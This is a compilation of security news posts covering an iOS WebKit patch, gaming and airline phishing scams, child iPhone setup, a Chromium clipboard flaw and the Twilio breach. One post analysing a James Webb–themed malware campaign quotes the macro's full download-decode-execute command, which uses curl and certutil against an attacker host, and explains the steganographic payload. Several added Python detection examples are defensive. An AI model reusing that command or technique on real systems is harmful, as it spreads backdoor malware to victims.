IT NEWS

Apple releases security update for iPhones and iPads to address vulnerability

Apple has released iOS 12.5.6, a security update for older iPhones and iPads, to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices.

The WebKit vulnerability, tracked as CVE-2022-32893, was fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1 on August 17, and in Safari for macOS Big Sur and macOS Catalina on August 18. This update brings the same fix to older devices that cannot run anything newer than iOS 12.

Zero-day?

Technically this is no longer a zero-day. By definition a zero-day is a vulnerability unknown to the party responsible for fixing it, typically the vendor, and this one has been known, and patched on current OS versions, for weeks. That distinction was of little comfort to users of older Apple devices, who had no patch to install until now.

WebKit vulnerability

CVE-2022-32893 is an out-of-bounds write in WebKit that Apple addressed with improved bounds checking. Processing maliciously crafted web content may lead to arbitrary code execution, so an attacker only needs to lure a victim to a specially crafted website, or plant the content in an advertisement (malvertising), to compromise a vulnerable device. WebKit is Apple's HTML rendering engine; it powers Safari and, because Apple requires it, every third-party browser on iOS as well, so switching browsers on an iPhone or iPad does not avoid the bug. iPhones, iPads, and Macs could all be tricked into running unauthorized code.

Apple has already said it’s aware of a report that the issue may have been actively exploited.

Not vulnerable

Apple notes in the security content for iOS 12.5.6 that iOS 12 is not affected by the second bug, CVE-2022-32894. As we wrote in our post about the two actively exploited zero-days, it seems likely that both were discovered in an attack that chained them: CVE-2022-32893 in WebKit gives the attacker initial code execution in the browser, and CVE-2022-32894, a kernel bug, is then used to escalate to kernel privileges. Such an attack could be delivered through a watering hole site or an exploit kit. That iOS 12 is immune to CVE-2022-32894 does not make the WebKit bug harmless there: it could just as well be chained with a different privilege escalation vulnerability.

Mitigation

Other than the statement that the bug has been exploited in the wild, Apple has not released details about the attacks. Both vulnerabilities are in CISA's Known Exploited Vulnerabilities catalog, with a patch deadline of September 8.

Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can update on the device itself (Settings > General > Software Update) or through iTunes to iOS 12.5.6.

Stay safe, everyone!

Final Fantasy 14 players targeted by QR code phishing

Final Fantasy 14, the smash-hit online role playing game, is under fire from scammers. The attack is a devious way to try and compromise player accounts, making use of free item promises and bogus QR codes.

As the game is a constantly changing service, it’s almost impossible to keep up with new features, offers, and content. The developers announce these changes on their blog, The Lodestone. What’s being talked about at the moment is the QR code-centric phishing attack.

The developers write:

As we have mentioned in the past, we have confirmed that certain individuals are attempting to direct players to fake login websites which imitate the Square Enix Account Management System in an effort to steal (also known as “phishing”) information such as their Square Enix ID and password, as well as date of birth.

Please also be aware of the following methods used to direct players to fake pages:

・Using FFXIV in-game chat to direct players to fake pages imitating Square Enix websites, including the Support Center, the Lodestone, and the official FINAL FANTASY XIV Forums.

・Including a QR code in an image disguised as an official Twitter or forum post, and scanning the QR code displays fake pages.

・Disguising as a FFXIV game play video with a link to fake pages as part of the video or in the description.

Before opening any URLs, we urge you to confirm that they are legitimate and not a fraudulent imitation.

How the QR code phish attack works

Thanks to players grabbing screenshots, we can show you what these attacks typically look like.

Scammers send direct messages (tells) to other players. Many of the accounts sending these messages appear to have been hijacked themselves. A link is sent to the victim, directing them away from the game to image hosting services.

What waits for them is a screenshot of a faked Tweet from the official Final Fantasy 14 account.

It reads as follows:

We’ve decided to sneak another mount into the 6.2 release. Scan the QR code to automatically add the mount. This mount is only available until 4th September, after this date the mount will become tradeable and will be the only way to own this, so claim it now.

Mounts, pets, and other in-game items can be quite expensive. As a result, any promise of free items will no doubt catch some attention. Scanning the QR code will take the would-be item grabber to a fake login portal. Once the account is stolen, the scammers are free to use it to continue the phishing antics. Gaming accounts with a lot of in-game funds or items attached are of course very valuable. Depending on the game and how trading works, they may sell the account, or items, or trade other content. Final Fantasy 14 players are also at risk due to the perils of Real Money Trading. Often, phishing feeds into this activity too.

Avoiding the scam

In terms of bogus websites, Square Enix has this advice:

The Square Enix Account Management System complies with EV SSL certification. Should a website ask for your Square Enix Account information, please make sure that the website is legitimate before entering any information. On certain web browsers, the address bar will display an icon indicating the website’s security certificate. On a legitimate Square Enix Account Management System login page, clicking this security icon will display references to “SQUARE ENIX CO., LTD.”

* On a legitimate website operated by SQUARE ENIX CO., LTD., no other pages apart from login pages will require password entry, nor will any of our staff ever ask you for your password.

Examples of characteristics used in phishing URLs:

* The “s” is missing from “https” in the URL of the login page. The fake website will display http:// in the URL.

* The hyphen symbol is missing from “square-enix.” The fake website will display variations of “squareenix” in the URL.

* The letter “i” is replaced with various characters like “l” or “j.” The fake website will display “square-enlx” or “square-enjx.”

* The “com” in “square-enix.com” is replaced by various domains.

In terms of additional account security, you can enable Square Enix's One-Time Password on the account: a six-digit code, generated by the Square Enix Software Token app or by a physical security token, that is requested at every login. Even if a phishing page captures your ID and password, an attacker without a valid code cannot log in. Be aware, though, that a phishing page that also asks for the code can relay it to the real site in real time, so the URL checks above still matter.
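The cues in Square Enix's list can be turned into a mechanical check. The following is an added example written for this article, not Square Enix's code and not an official tool: it takes square-enix.com from the advice above as the only legitimate domain, applies the four substitution patterns the advice describes (plus "1" and "|" as further stand-ins for "i", which is an assumption), and classifies a handful of constructed sample URLs. The public-suffix handling is deliberately naive (last two labels of the host).

```python
"""Classify a login URL against the lookalike cues Square Enix lists above.
Added example for this article, not Square Enix's code. LEGIT_DOMAIN is the
domain named in the advice; the substitution rules are the ones it describes;
the URLs in SAMPLES are constructed for illustration."""
import re
from typing import Dict, List
from urllib.parse import urlsplit

LEGIT_DOMAIN = "square-enix.com"
# Characters swapped in for the letter "i": l and j are from the advice,
# 1 and | are added here as an assumption.
I_LOOKALIKES = re.compile(r"[lj1|]")


def fold(name: str) -> str:
    """Undo the documented tricks: drop hyphens, fold i-lookalikes back to 'i'."""
    return I_LOOKALIKES.sub("i", name.lower().replace("-", ""))


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Assumption: no public-suffix list, so
    two-part suffixes such as .co.uk are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_url(url: str) -> Dict[str, object]:
    """Return a verdict (legitimate / suspicious / unrelated / invalid) and
    the list of cues that fired."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return {"verdict": "invalid", "findings": ["no host in URL"]}

    findings: List[str] = []
    if parts.scheme != "https":          # cue 1: the fake shows http://
        findings.append(f"scheme is '{parts.scheme or 'none'}', not https")

    domain = registrable_domain(host)
    legit_sld, legit_tld = LEGIT_DOMAIN.split(".")
    sld, _, tld = domain.rpartition(".")

    if domain == LEGIT_DOMAIN:
        verdict = "legitimate" if not findings else "suspicious"
    elif fold(sld) == fold(legit_sld):
        # Same name once the substitutions are undone: a lookalike. Say which trick.
        if "-" not in sld:                                      # cue 2
            findings.append("hyphen missing from 'square-enix'")
        if sld.replace("-", "") != legit_sld.replace("-", ""):  # cue 3
            findings.append(f"letter substitution: '{sld}' instead of '{legit_sld}'")
        if tld != legit_tld:                                    # cue 4
            findings.append(f"'.{legit_tld}' replaced by '.{tld}'")
        verdict = "suspicious"
    elif fold(legit_sld) in fold(host):
        # e.g. square-enix.com.account-check.xyz: the brand is only a subdomain
        findings.append(f"brand name embedded in unrelated domain '{domain}'")
        verdict = "suspicious"
    else:
        verdict = "unrelated"
    return {"verdict": verdict, "findings": findings}


# Constructed sample URLs; none of these are known phishing sites.
SAMPLES = [
    "https://secure.square-enix.com/account/app/svc/login",
    "http://secure.square-enix.com/account/app/svc/login",
    "https://squareenix.com/login",
    "https://square-enlx.com/login",
    "https://square-enix.net/login",
    "https://square-enix.com.account-check.xyz/login",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = classify_url(sample)
        print(f"{result['verdict']:<11} {sample}  {result['findings']}")
```

The check only catches the patterns Square Enix named; a phishing site on a completely unrelated domain (a shortened link, say) comes back as "unrelated", not "legitimate", which is why the only safe answer is still to type the address yourself.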

QR code scams are very popular in Final Fantasy land, and you can bet they’ll come back around in another form in the near future.

Stay safe out there!

How to set up an iPhone for your kids

Thanks to Thomas Reed for his expertise and guidance.

This is it.

After much hemming and hawing, you’ve finally given in and bought your child their first smartphone, which you plan to give to them before the school year starts.

But before you give it to them, it’s worth sitting them down to talk to them about things like what apps and sites they shouldn’t use or visit, what online behaviors to avoid engaging in, and what scams they need to look out for. There are also a few easy things you can do to the iPhone itself to make things a bit safer. Here are our suggestions:

Secure the iPhone

When we think about securing a phone, we tend to think of the worst case, and for smartphones that is losing it or having it stolen. Make sure the phone locks itself whenever it is unattended or not in use (Settings > Display & Brightness > Auto-Lock).

Help your child choose a passcode for their iPhone that they can remember, and steer them away from the obvious ones such as a birthday or 1234. Then set up Face ID or Touch ID as an alternative way to unlock the phone, enrolling your own face or fingerprint as well as theirs, so that you can get into the device in an emergency.

While we’re on the subject of losing phones, also make sure you—

Enable the Find My feature

That'll make finding a missing phone simpler, and it also lets you lock or erase the device remotely if it doesn't turn up. You can find the step-by-step process on Apple's official site.

If you want to keep track of your child at necessary times, you can also use location sharing in Find My (formerly the separate Find My Friends app). Just make sure that you talk to your child about it first; with older kids and young adults, use the feature only with their permission.

Set up your child’s own Apple ID

If a child is going to have their own iPhone, they should have and use their own Apple ID, too.

After creating your child’s Apple ID, enable two-factor authentication (2FA) for that added layer of security, ensuring that your child’s account won’t get popped easily even if someone got hold of their password.

Note that your child’s iCloud account is automatically created along with their Apple ID. Depending on how heavily they use this feature, you might want to consider purchasing a subscription that grants them some extra online storage. Maybe not now, but in the future.

Having an iCloud account benefits your child more than not having one. When they get older, they may also want to use their account on an iPad or want a newer phone model. An iCloud account makes this easier, but remember that having data in the cloud also has security and privacy risks attached to it.

Once your child has an Apple ID, add them to Family Sharing. With it you can not only hand pick what content to share with members of the family but also, through Ask to Buy, approve or decline every purchase and download of games, ebooks, and apps on their device wherever you are.

Disable or hide features you deem off-limits or unnecessary

iPhones have features that young kids can use, and there are some that they just shouldn’t touch at all until they’re old enough or you explicitly give them permission to use.

Ideally, we don't want our kids fiddling with Screen Time, as it holds many of the settings they would happily change to suit themselves. These settings include (among others):

  • Content restrictions on Safari
  • iTunes and App Store purchases
  • Siri and Dictation
  • Privacy settings (includes location services)

You can secure Screen Time by creating a passcode for it. Make sure you use a passcode that’s different from other passcodes you help set up with your child.

Depending on your child's age, mental and emotional maturity, and how you want them to use their device, feel free to add to or remove from the list above. For example, if your child is 10 or 11, you might want to hide the email feature for now until they're a bit older. Remember, what you disable or hide should be non-negotiable, at least until a later date, when you can review, assess, and adjust accordingly.

Limit or restrict features they can use

This is probably the hard part since your child is likely to have different views from you on what they should be allowed to do on their phone. When it comes to having social networking accounts, for instance, you may want to delay this for a few more years, even if the platform allows 13-year-old kids to use it.

Being in social networks at a young age is risky for children. Child predators camp on there, and not every piece of content shared within these environments is child-friendly. One study even showed that, apart from giving kids a different or unhealthy view of the real world, young children who are on TikTok began developing tics and having tic-like attacks brought about by anxiety and stress. They may also begin showing signs of mental health issues. 

As a parent or guardian, you can also set daily screen time limits, which is easy to do with Screen Time through Family Sharing. Apple has a guide on how to set this up as well.

If your child is into playing games on their iPhone, you might want to tweak Game Center settings, so they’re not exposed to potential risks needlessly. iOS can restrict adding friends, playing multiplayer games, and the sending of private messages (among others) on the Game Center.

The iPhone also has Guided Access, which locks the device into a single app and can put a time limit on the session. It is useful when you hand the phone over for one specific purpose and want nothing else to be reachable.

Do you have an old iPhone you want to hand down to your child instead of buying a new one? Make sure your own files are properly backed up in iCloud, sign out of your Apple ID on the phone (otherwise Activation Lock will keep it tied to you), and then wipe your data with a factory reset before setting it up with your child's Apple ID.

Final thoughts

Giving your kids a new smartphone doesn't mean that you're giving them free rein to do what they want with it. Walking them through the setup process and talking with them about what is and isn't acceptable, while also giving them an opportunity to speak up, is a good way of showing, and reminding, your kids that at the end of the day you, the parent or guardian, are the boss.

You don’t even have to tell them that.

James Webb telescope images used to hide malware

A rather unusual way to spread malware, riding on the popularity of the James Webb telescope images, has been identified by the Securonix threat research team.

The malware is spread by a phishing campaign whose emails carry a Microsoft Office attachment. As with traditional Office macros, the template file contains Visual Basic code that starts the first stage of execution once the user enables macros. Several stages later, the actual payload turns out to be a Go binary that acts as a backdoor.

Golang

Go (Golang is a nickname, after the language's golang.org domain) is an open source programming language. Some threat actors have moved to cross-platform languages such as Go, Python, and Rust so that one code base can be compiled for many combinations of operating system and CPU architecture, reaching as many systems as possible. Go binaries are also statically linked and large, which makes them look unlike the C/C++ malware most analysts are used to.

VBA Macro

In this campaign, opening the document fetches a malicious template file (a remote template) and saves it on the system. The template carries Auto_Open, AutoOpen, and AutoExec procedures, the names Office runs automatically, so the malicious VBA code executes as soon as macros are enabled.

VBA macros should stay disabled unless there is a compelling reason otherwise. As we explained when Microsoft started blocking macros in internet-downloaded files for five Office apps, that block depends on the Mark of the Web (MOTW), which malware authors can strip or avoid, for instance by delivering the document inside a container format that does not propagate it.

Certificate

The obfuscated code in the macro executes the following command:

cmd.exe /c cd c:\users\{username}\appdata\local & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.
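That chain is distinctive on its own: a download of a file with an image extension, certutil -decode turning that "image" into an .exe, and the .exe being run in the same command line. Below is an added example, written for this article and not Securonix's or Malwarebytes' detection logic, that scores such chains in process command lines. It uses the command above (with its backslashes restored; {username} is the macro's placeholder) as the malicious sample, and two constructed benign command lines for contrast.

```python
"""Flag the download -> certutil -decode -> run chain in process command lines.
Added example written for this article; it is not Securonix's or Malwarebytes'
detection logic. SAMPLE_CMDLINE is the command quoted in the article with its
backslashes restored; the benign command lines in the test are constructed."""
import re
from typing import Dict, List

IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif|bmp)$", re.I)
EXEC_EXT = re.compile(r"\.(?:exe|dll|scr|com)$", re.I)
# Optional "cmd.exe /c" or "/k" wrapper, possibly with a full path and quotes.
CMD_PREFIX = re.compile(r'^\s*"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+(.*)$', re.I)

# From the article (backslashes restored); {username} is the macro's placeholder.
SAMPLE_CMDLINE = (
    r"cmd.exe /c cd c:\users\{username}\appdata\local & "
    r"curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg "
    r"-o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe "
    r"& msdllupdate.exe"
)


def split_chain(cmdline: str) -> List[str]:
    """Strip a cmd.exe /c wrapper and split on & or &&.
    Assumption: no quoted ampersands, which holds for macro droppers like this one."""
    m = CMD_PREFIX.match(cmdline)
    body = m.group(1) if m else cmdline
    return [p.strip() for p in re.split(r"\s*&&?\s*", body) if p.strip()]


def base_name(path: str) -> str:
    """File name without directory or quotes, lower-cased (Windows is case-insensitive)."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(cmdline: str) -> Dict[str, object]:
    """Walk the chain once, remembering what was downloaded and what certutil
    produced, so each later step can be judged against the earlier ones."""
    findings: List[str] = []
    downloaded, decoded = set(), set()
    for step in split_chain(cmdline):
        tokens = step.split()
        exe = base_name(tokens[0])
        if exe in ("curl", "curl.exe") and "-o" in tokens[:-1]:
            downloaded.add(base_name(tokens[tokens.index("-o") + 1]))
        elif exe in ("certutil", "certutil.exe"):
            flags = [t.lower() for t in tokens]
            if "-decode" in flags and flags.index("-decode") + 2 < len(tokens):
                i = flags.index("-decode")
                src, dst = base_name(tokens[i + 1]), base_name(tokens[i + 2])
                if IMAGE_EXT.search(src):
                    findings.append(f"certutil -decode reads an image-named file: {src}")
                if EXEC_EXT.search(dst):
                    findings.append(f"certutil -decode writes an executable: {dst}")
                    decoded.add(dst)
                if src in downloaded:
                    findings.append(f"decodes a file fetched earlier in the chain: {src}")
        elif exe in decoded:
            findings.append(f"chain runs the file certutil just produced: {exe}")
    return {"score": len(findings), "findings": findings}


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, "certutil -decode cert.b64 cert.cer"):
        print(analyse(line))
```

Any single certutil -decode is common enough in admin scripts that alerting on it alone produces noise; the value is in the relationship between the steps, which is why the function carries state across the chain rather than matching each step in isolation.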

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

[image: oxb36f8geec634.jpg as it displays in an image viewer]

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

Obfuscation

The image file has a Base64 block appended to it, framed by "-----BEGIN CERTIFICATE-----" and "-----END CERTIFICATE-----" lines so that it looks like an included certificate. An image viewer stops at the JPEG end-of-image marker and never shows the extra bytes, while certutil, a tool that exists to convert certificates, locates the framed block, ignores everything around it, and decodes it. Base64 is an encoding scheme designed to carry binary data over channels that only reliably support text; on the web it is commonly used to embed images and other binary assets inside text formats such as HTML and CSS.

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.
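To see how the decoding works, here is an added example (written for this article, not code from Securonix or Malwarebytes) that builds a small constructed JPEG with a fake certificate block appended, carves the payload out the way certutil -decode does, and reports what a file scanner should notice: bytes after the JPEG end-of-image marker, a PEM frame inside an image file, and a decoded payload that starts with the MZ header of a Windows executable. The image bytes and the payload are constructed; nothing here is taken from the real oxb36f8geec634.jpg.

```python
"""Carve a PEM-framed Base64 payload appended to a JPEG, the way certutil -decode
recovers it. Added example for this article, not Securonix's or Malwarebytes'
code. The 'image' and the 'payload' are constructed; nothing below is taken
from the real oxb36f8geec634.jpg."""
import base64
import re
from typing import Dict, Optional

JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image; a viewer stops reading here
PEM_BLOCK = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)


def build_sample(payload: Optional[bytes] = None) -> bytes:
    """Minimal JPEG skeleton (SOI + JFIF APP0 segment + padding + EOI), optionally
    followed by a fake certificate block carrying `payload`. Constructed sample."""
    picture = (
        JPEG_SOI
        + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
        + b"\x00" * 64
        + JPEG_EOI
    )
    if payload is None:
        return picture
    pem_body = base64.encodebytes(payload)  # 76-column lines, like a real PEM body
    return (picture + b"\n-----BEGIN CERTIFICATE-----\n" + pem_body
            + b"-----END CERTIFICATE-----\n")


def trailing_data(blob: bytes) -> bytes:
    """Everything after the last EOI marker. A clean JPEG has nothing there."""
    idx = blob.rfind(JPEG_EOI)
    return b"" if idx < 0 else blob[idx + len(JPEG_EOI):]


def carve_pem_payload(blob: bytes) -> Optional[bytes]:
    """Do what certutil -decode does: skip the picture, find the PEM frame,
    Base64-decode what is inside it (newlines are ignored by the decoder)."""
    m = PEM_BLOCK.search(blob)
    return base64.b64decode(m.group(1)) if m else None


def triage(blob: bytes) -> Dict[str, object]:
    """What a file scanner should report for an image fetched by a macro."""
    payload = carve_pem_payload(blob)
    return {
        "is_jpeg": blob.startswith(JPEG_SOI),
        "bytes_after_eoi": len(trailing_data(blob)),
        "has_pem_block": payload is not None,
        "payload_size": len(payload) if payload else 0,
        # "MZ" is the DOS header every Windows PE file starts with
        "payload_is_pe": payload is not None and payload.startswith(b"MZ"),
    }


if __name__ == "__main__":
    # Stand-in for msdllupdate.exe: a fake PE header, not a runnable program.
    fake_pe = b"MZ" + b"\x90" * 200
    print(triage(build_sample(fake_pe)))
    print(triage(build_sample()))
```

On a real sample, read the file in binary mode and pass the bytes to triage(); a non-zero bytes_after_eoi is by itself worth a look, because legitimate image software has no reason to write past the end-of-image marker.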

Payload

The malware payload copies itself into %LOCALAPPDATA%\microsoft\vault and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory %LOCALAPPDATA%\microsoft\windows\MsSafety and adds another copy of msdllupdate.exe to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

  • sleep to change the timeout between C2 requests
  • timeout to change the timeout parameter in the nslookup request
  • all other commands are executed with "cmd.exe /c"

Basically this allows the threat actor to execute arbitrary code on the affected machine.

Mitigation

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

[image: Malwarebytes blocking the file as Generic.Malware]

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing. Our recent participation in two highly-regarded industry evaluations, namely MRG-Effitas and Info-Tech’s Data Quadrant Report, reflects our belief that continual testing and unbiased validation are crucial to our mission to deliver easy, effective, and efficient cyber protection for customers. 

Info-Tech’s Data Quadrant report: Malwarebytes ranks #2 overall and #1 across several key areas

Using data collected from real end users, Info-Tech’s Data Quadrant Reports provide a holistic, unbiased view of the product landscape to help you determine which product is right for your organization. Malwarebytes ranked #2 out of 14 organizations in the report, earning a composite satisfaction score of 8.8.


Malwarebytes also took the #1 spot for three different categories: 

  1. Usability And Intuitiveness (Shallow end user learning curve): 87% user satisfaction 

  2. Vendor Support (Offers quality support): 84% user satisfaction 

  3. Flexible Deployment Options (Supports on-premise, cloud and hybrid IT environments): 87% satisfaction

MRG Effitas 360° Assessment & Certification: Badges across the board

MRG Effitas, a world leader in independent IT research, published its antivirus efficacy assessment results in August 2022. We achieved the highest possible score (100%) for a fourth consecutive quarter and received certifications for Level 1 (the highest ranking awarded by MRG Effitas), Exploit, Online Banking, and Ransomware.

Tested and published in a separate report, our mobile product also achieved the MRG Android 360 degree certification. 


Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats:

  • 100 percent of “in the wild” threats blocked: Tested malware considered as ‘zero-day’, delivered by URLs 

  • 100 percent of ransomware blocked: Tested ransomware samples written in-house (with no known signatures or community verdicts)

  • 100 percent of financial malware blocked: Tested financial malware used in the Magecart credit card-skimming attack

  • 100 percent of fileless attacks blocked: Tested to see how security products protect against a specific exploitation technique

  • 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks.

Malwarebytes Endpoint Protection also delivered the fourth best performance rating of all tested vendors, and did it with zero false positives, providing further evidence that the Malwarebytes EP delivers the right combination of powerful detection without affecting overall operating system performance.

Easy, effective, and efficient cyber protection validated by third-party testing

Malwarebytes is committed to regularly subjecting our solutions to third-party testing.

Third-party testing is critical to ensuring that your endpoint security solution performs well where it counts, whether that’s ease-of-use, rate of false positives, percentage of threats blocked, and so on. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

British Airways customers targeted in lost luggage Twitter scam

Getting back into the travel habit? Jumping on a plane soon? Experienced a bit of a luggage disaster and looking for help on social media? Watch out, because a lack of prior research could prove very costly.

Word has spread of a bogus Twitter account pretending to be a customer support channel of British Airways. Now suspended, the fraud operation seems to have taken a fair bit of cash before being shut down. 

Lose your luggage, find a fraud

People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. The account asked for phone numbers and likely pushed for additional contact via Twitter’s private message system.

Unfortunately, these offers of help quickly turned sour. The scam account requested various forms of payment to help recover the missing luggage. Although the fakers have been suspended, a lot of replies sent their way still exist. Looking through, we can see at least one individual who was initially told that her luggage was “lost in Dallas”. To move things along, a request for payment was made using the payment system Wise.

Though the first request was for a small amount, the scammers quickly ramped things up, and it wasn't long before the victim complained of being asked for even more money. Eventually, they claim to have lost no less than a thousand US dollars, and of course they still have no idea where their luggage ended up. Taking money from people who are overseas with no belongings, and leaving them with a potentially emptied bank account, is quite the vicious approach.

Avoiding the luggage assistance fakers

Here are some things you should do, and be aware of, when in transit.

  • Airlines are not going to ask for additional fees or payment to help you look for your bags.
  • Be wary of non-verified accounts replying to you. Is it asking for additional personal details? Phone numbers? Payment? Why?
  • Go directly to the source. Use official websites, verified support channels, phone numbers listed on those official websites. You can pretend to be anyone you like on social media, and this is a ripe field for potentially costly scams.
  • If you’re still not sure of the authenticity of an account you’re dealing with, go to the airport help desk. If you’ve realised your bags are missing, you’re almost certainly still in the terminal. Make full use of their availability and ensure everything and everyone you’re interacting with is the real deal.

As people slowly start to get back into the swing of travel, it’s inevitable that fraudsters will do as much as they can to rip those travellers off in any way they can. Customer support is great, but it pays to be mindful when ringing the help alarm. You never quite know who’s going to show up in response.

Chromium browsers can write to the system clipboard without your permission

If you are a user of Google Chrome or any other Chromium-based web browser, then websites may push anything they want to the operating system’s clipboard without your permission or any user interaction. This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge.

Clipboard

In layman’s terms, the clipboard is where the data lives while you copy and paste, or cut and paste for that matter. Copying and pasting is such an essential part of our daily computing that most of us just do it automatically. And it can lead to undesirable results if something outside of our control decides to interfere. For example, if you used the “cut” action on a certain piece of text with the intention to paste it somewhere else, it can be a nasty surprise if something completely different gets pasted, and due to using the cut rather than copy, you may have lost the original.

Gestures

Firefox and Safari require a user gesture before a website can write to the device's clipboard. A user gesture here means a transient user activation: the user clicked, tapped, or pressed a key (Ctrl+C, say) on the page shortly before the write was attempted. Without it, the write is refused. Chrome and other Chromium-based browsers currently have no such restriction.

Demonstration

If you’d like to see this demonstrated or if you want to check if you are somehow protected against this happening, you can visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards. You can check the content by “pasting” to an empty text editor like Notepad. Should you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

“Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.”

Windows clipboard manager

For Windows 10 and 11 users there is a way to retrieve overwritten items from your clipboard. These Windows versions come with a clipboard manager, although it does need to be turned on first. This can be done in the Settings menu on your computer. Under System, you’ll find a section called Clipboard. Toggle the switch to On behind Clipboard history. Windows will now start keeping track of your clipboard content. To review the history up to 25 items you can use the Win+V keys.

Not new

At Malwarebytes Labs we wrote about clipboard poisoning attacks on the Mac back in 2016. The takeaway from that article in the current context is that text pasted into a sensitive place, like the Terminal on a Mac or a Command Prompt on a Windows machine, can become a command that gets executed: a newline at the end of the clipboard content is enough to run it without you pressing Enter.

Broken

In his article about the clipboard issue, developer Jeff Johnson states that the user gesture requirement for writing to the clipboard was accidentally broken in version 104. And although the vulnerability has been flagged, fixing it may be delayed because it breaks other functionality. Apparently, adding user gesture requirement for readText and writeText APIs breaks NTP doodle sharing. NTP Google doodles are animations that appear in some cases in Chrome when a new tab is opened. Personally, I wouldn’t miss them at all.

Mitigation

While we wait for a fix, threat actors may find ways to abuse this temporary vulnerability. Here are some things you can do to stay on the safe side:

  • Do not open webpages between a cut/copy and the paste that goes with it.
  • Check the content of your clipboard before you paste into any sensitive area, such as a terminal or a payment form. You can use a clipboard manager or just paste into a plain text field first to see what is currently there. For those of you doing financial transactions this is always worth doing, since there is malware that swaps bitcoin addresses and bank account numbers on your clipboard.

Stay safe, everyone!

Twilio data breach turns out to be more elaborate than suspected

Earlier this month, communications provider Twilio was compromised through a social engineering attack. After phishing company employees, the attackers were able to access customer data, and it now appears that the impact was larger than originally assumed.

In a first update, Twilio, a cloud-based communication platform provider, revealed that the attackers also compromised the accounts of some users of Authy, its two-factor authentication (2FA) app. Outside of Twilio, the identity authentication company Okta revealed that the data of some Okta customers was accessible to the threat actor as well. And Signal tweeted that it, too, had been affected by the Twilio breach.

Authy

Authy is a two-factor authentication (2FA) service from Twilio that allows users to secure their online accounts by double-checking the login attempt via a dedicated app, after typing in the login credentials.

By gaining access to 2FA data, the malicious actors gained access to the accounts of 93 individual Authy users and registered additional devices to their accounts. Twilio says that it has now removed such devices from accounts.

Okta

Okta has determined that a small number of mobile phone numbers and associated SMS messages containing one-time passwords (OTPs) were accessible to the threat actor via the Twilio console. A one-time password is an automatically generated numeric or alphanumeric string that authenticates a user for a single transaction or login session. OTPs expire after a short period, from 30 seconds for app-generated codes to a few minutes for codes sent by SMS, which is exactly the window an attacker reading them out of a provider's console needs.

Okta offers customers a range of authenticators to choose from, including the use of SMS for the delivery of one-time codes. Twilio provides one of two services Okta leverages for customers that choose to use SMS as an authentication factor.

Signal

Signal is an end-to-end encrypted messaging service, similar to WhatsApp or iMessage, but owned and operated by a non-profit foundation. Twilio provides Signal with phone number verification services. As a result of the attack on Twilio, Signal warned that for 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal. These 1,900 users were notified directly, and prompted to re-register.

[image: Signal's tweet about the Twilio breach]

Scatter Swine

The Twilio data breach appears to be part of a larger campaign from hackers that targeted at least 130 organizations, among them MailChimp, Klaviyo, and Cloudflare.

In this campaign, spanning recent months, a number of technology companies were subject to persistent phishing attacks by a threat actor that you will see referred to as Scatter Swine or 0ktapus. This threat actor is known to repeatedly target the same organizations with multiple phishing attacks within a matter of hours.

In the Twilio case, the threat actor searched for 38 unique phone numbers in the Twilio console, nearly all of which can be linked to a single targeted organization. A review of logs provided by Twilio revealed that the threat actor was seeking to expand their access. It is likely that the threat actor used credentials previously stolen in phishing campaigns to trigger SMS-based MFA challenges, and used access to Twilio systems to search for OTPs sent in those challenges.

Mitigation

If you are a user of any of the services mentioned above, you should have been notified if your account was affected, but it doesn’t hurt to check the advice and details about the attack on their respective sites.

